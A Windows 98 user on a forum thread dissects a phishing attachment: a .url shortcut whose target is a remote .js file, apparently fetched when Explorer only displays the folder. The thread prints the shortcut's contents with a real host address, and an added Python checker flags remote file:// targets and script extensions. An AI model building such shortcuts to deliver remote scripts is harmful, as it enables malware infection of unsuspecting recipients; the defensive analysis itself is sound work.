Nomen

Interesting malware received via email

Got an email recently from an IP-range (191.37.0.0/16) that my server was blocking until recently when I opened the range for some reason (needless to say I will be blocking it again). The email came with an attachment named IMG_20180402_(9-digit-number).zip

When unzipped, it gives this file: 4403BLGL_Q, a file with no extension. At least I don't see one when viewing the folder in win-98. But get this - it does have an extension. In DOS, the file name is 4403BLGL_Q.url

So my first question is, does explorer have special handling for .url files? Something that sort-of bugged me is that immediately after unzipping to its own folder, and then opening that folder, I could see that file, but the folder seemed to be frozen for 10, 20 seconds. It wasn't responding to mouse clicks. The icon associated with the file was sort-of strange.

I think it hangs because the file properties say it's an internet shortcut, and these files have a Web Document file property URL, and this file's URL was "file // 169.239.128.129 /upload/4403BLGL_Q.js". In other words, I believe that .js file was trying to be downloaded and executed just by viewing the folder where that file resides. That site wasn't giving me that .js file. I believe it was trying to render the icon for the file from that .js file which it was trying to remotely access. The file itself contains the following (and even though I've munged part of the following, it still might trigger an A/V response either by the msfn server or your browser):

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
URL=file //blabla 169.239.128.129/upload/4403BLGL_Q.js
IconFile=C:\Windows\system32\shell32.dll
IconIndex=46
IDList=
HotKey=0

Anyways, only 7 out of 60 AV programs identify this file as a threat. It's mostly called Jesdow.B. The machine hosting the .js file was not serving it to me as of the time I was looking into this, so I don't know if it was taken down or it didn't like my user-agent. My basic question here is, is this a new threat vector mechanism? Is there a way to deactivate explorer's handling of .URL files or any file with this property? Would win-98 have actually processed the .js file correctly anyways?

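Added here as an illustration, not something posted in the thread: a small Python checker that parses a .url file the way the one above is laid out and reports the references a defender would want to know about before Explorer or anything else touches it: a file:// URL with a remote host, a UNC path in IconFile, or a target with a script extension. The sample bodies are constructed (192.0.2.10 is an RFC 5737 documentation address, not the host from the email), and the function and constant names are mine. It reads the file text only and never fetches the target.

```python
"""Inspect Windows Internet Shortcut (.url) files for remote references.

Added example, not code from the MSFN thread.  A .url file is an INI-style
text file; the [InternetShortcut] section carries the target (URL=) and the
icon source (IconFile=).  Explorer reads these to draw the icon and to resolve
the link, so a value that names a remote host is worth flagging before the
file is ever opened in a folder view.
"""
import posixpath
from urllib.parse import urlsplit

# Constructed sample, laid out like the shortcut quoted in the thread.
# 192.0.2.10 is a documentation address (RFC 5737), not a real host.
MALICIOUS_SAMPLE = """[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
URL=file://192.0.2.10/upload/4403BLGL_Q.js
IconFile=C:\\Windows\\system32\\shell32.dll
IconIndex=46
IDList=
HotKey=0
"""

# Constructed benign shortcut: an https link with a local icon.
BENIGN_SAMPLE = """[InternetShortcut]
URL=https://example.com/
IconFile=C:\\Windows\\system32\\shell32.dll
IconIndex=46
"""

SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                     ".exe", ".scr", ".bat", ".cmd", ".ps1"}
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}


def parse_url_file(text):
    """Return {section: {key: value}}, names lower-cased, junk lines skipped."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_host(target):
    """Host name if `target` is a UNC path or file:// URL off this machine, else None."""
    if target.startswith(("\\\\", "//")):
        head = target.replace("\\", "/").lstrip("/").split("/", 1)[0].lower()
        return head if head not in LOCAL_HOSTS else None
    parts = urlsplit(target)
    if parts.scheme.lower() == "file":
        host = (parts.hostname or "").lower()
        return host if host not in LOCAL_HOSTS else None
    return None


def target_extension(target):
    """Lower-cased extension of the path part of a URL or local/UNC path."""
    path = target.replace("\\", "/")
    if "://" in path:
        path = urlsplit(path).path
    return posixpath.splitext(path)[1].lower()


def analyze_url_file(text):
    """Return a list of findings (empty list means nothing suspicious)."""
    findings = []
    shortcut = parse_url_file(text).get("internetshortcut", {})
    target = shortcut.get("url", "")
    icon = shortcut.get("iconfile", "")
    host = remote_host(target)
    if host:
        findings.append(f"URL points at remote file share host {host}")
    icon_host = remote_host(icon)
    if icon_host:
        findings.append(f"IconFile points at remote host {icon_host}")
    ext = target_extension(target)
    if ext in SCRIPT_EXTENSIONS:
        findings.append(f"URL target has script/executable extension {ext}")
    return findings


if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, "->", analyze_url_file(body) or "no findings")
```

Run it from a DOS box or any shell against the extracted file's text (open the file in text mode and pass the contents to analyze_url_file) and it will tell you whether the shortcut names a remote host before you open the folder in Explorer. Flagging both URL= and IconFile= matters because either one can make the shell reach out to the network while it draws the folder view.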

Isn't there an option for explorer to show file extensions even for known types? That should make it appear. That IP is reported as a spam address for email/phishing/sms, and the server is still running even though it does show 404 for the full address in your link. It is possible that it was "Caught" but since I see a report for 9 hours ago, it is also possible it only temporarily hosts the malware files on it.


I was looking into this .js file last night (about 14 hours ago) and even then that IP wasn't giving me the .js file. Yes, I have explorer set to show file extensions, but I think there are still exceptions that require registry modifications to show (like shell scrap objects). Maybe this .url is another such file type?


I always UnZip Files from a DOS Box. All extensions are visible and nothing can be executed.

4 hours ago, Nomen said:

URL=file //blabla 169.239.128.129/upload/4403BLGL_Q.js

Usual JS downloader/dropper/injector. Nothing abnormal.

You or your email program open the .url file (it's a shortcut); the shell goes to the link, downloads the .js file and executes it; your IE core will be attacked by this or by any secondary loaded script...


Although the mentioned address sounded to me like a normal IP for the private network (according to Wikipedia, however, I am wrong), the Anti-Virus software detects the IP to be malware on my (non Windows 98SE) system. Access is blocked for me therefore.

I do assume that the .url file extension gets hidden similar to .lnk or .exe if Windows 98 is configured to do so.

Edited by winxpi

49 minutes ago, winxpi said:

I do assume that the .url file extension gets hidden similar to .lnk or .exe if Windows 98 is configured to do so.

Yes, similar to .lnk and .pif.

The fact that the extension is not shown by explorer is not the primary item I thought would be discussed here. It was the fact that simply viewing the folder containing the file in question triggered the attempted downloading of the .js file, and because the IP address was no longer hosting the .js file, the explorer folder window was frozen for a time while the attempted download timed out. I was wondering how common it is to have this file-type trigger this behavior on the part of explorer. Is this a known exploit method? Does win-98 know what to do with a .js file in this context? Is there a registry entry that can disable this behavior?


I believe this behaviour is tied to "Preview Mode" which also can show thumbnails for image files, or .htm for example. When I look at this, it seems to relate to this CLSID: BB2E617C-0920-11d1-9A0B-00C04FC2D6C1 where most people have the opposite problem... their preview in Explorer does not work and they want to restore it. And then they need to create this key because it is missing.

Ref: http://www.oocities.org/~budallen/98reghak.html#Restore Preview Mode (Thumbnail) to Windows

But even that site says that is for everything... so if you are fine with that, you can backup that key and then delete it, reboot (or kill and restart explorer.exe) and see if it solves the issue. Before that, it does talk about using regsvr to handle just JPG files, perhaps there is another way to just handle .url files. ALSO, it may be worthwhile to use a software firewall and blacklist explorer.exe from accessing the internet, or just port 80... presuming that doesn't cause an issue with any other programs... You'd have to test it of course.

On 4.4.2018 at 2:40 PM, Nomen said:

The fact that the extension is not shown by explorer is not the primary item I thought would be discussed here. It was the fact that simply viewing the folder containing the file in question triggered the attempted downloading of the .js file, and because the IP address was no longer hosting the .js file, the explorer folder window was frozen for a time while the attempted download timed out. I was wondering how common it is to have this file-type trigger this behavior on the part of explorer. Is this a known exploit method? Does win-98 know what to do with a .js file in this context? Is there a registry entry that can disable this behavior?

Your questions are good. I don't know the answer as to whether it's an exploit, but it sounds like one.

The freezing: could be some issue related to Windows Explorer or the browser that attempted the download. Not sure.

Windows 98 has the Active Desktop. I really don't know how it works, to be honest. I just remember that it had the ability to make folders open like links (one click instead of double-click), and I think it was not so uncommon to sometimes have desktop backgrounds of pics that were actually on a webpage (not sure if they were actually embedded in the browser or downloaded to a temporary folder to do that). But the Active Desktop might have something to do with why win98 "did something" regarding the .js file.

You might try to disable Active Desktop, but I don't know if this behaviour from the .js files can be disabled by a registry change (maybe for IE but probably not for all browsers); it really depends what was going on there, and I cannot rule out that an exploit was used.

My first guess would be that the folder might have something like preview mode, I mean this feature that allows you to see a preview of a photo or video. Might be that this triggers a .js file. Not sure, however.
